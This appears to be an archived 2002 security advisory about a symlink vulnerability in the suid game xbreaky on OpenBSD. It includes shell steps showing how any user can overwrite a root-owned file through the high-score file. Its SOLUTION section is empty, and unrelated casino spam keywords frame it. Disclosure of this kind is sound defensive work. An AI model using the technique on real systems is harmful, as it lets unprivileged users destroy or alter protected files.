Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino

13th Sep 2002 [SBWID-5685]

COMMAND
		xbreaky symlink vulnerability
SYSTEMS AFFECTED
		xbreaky versions prior to 0.0.5 on OpenBSD
PROBLEM
		Marco van Berkum [[email protected]] [http://ws.obit.nl] with the  help
		of Dennis Oelkers :
		By default xbreaky is installed as suid and can be abused  to  overwrite
		any file on the filesystem, by any user.
		 Exploit
		 -------
		xbreaky uses $HOME/.breakyhighscores to write the  highscores  to,  when
		$HOME/.breakyhighscores is symlinked to another  file  (*any*  file)  it
		simply overwrites it as root user.
		 Example
		 -------
		
		root@animal:/home/marco# echo "bla" >rootfile
		root@animal:/home/marco# chmod 600 rootfile
		root@animal:/home/marco# exit
		logout
		marco@animal:~$ ln -s rootfile .breakyhighscores
		marco@animal:~$ xbreaky
		
		Now I play a game and set highscore as  user  "lol",  then  I  exit  the
		game. Its a nice game btw :)
		
		marco@animal:~$ cat rootfile
		cat: rootfile: Permission denied
		marco@animal:~$ su -
		Password:
		root@animal:~# cat /home/marco/rootfile
		lol <- voila, our highscore user
		
SOLUTION

Internet highlights

Casino Not On Gamstop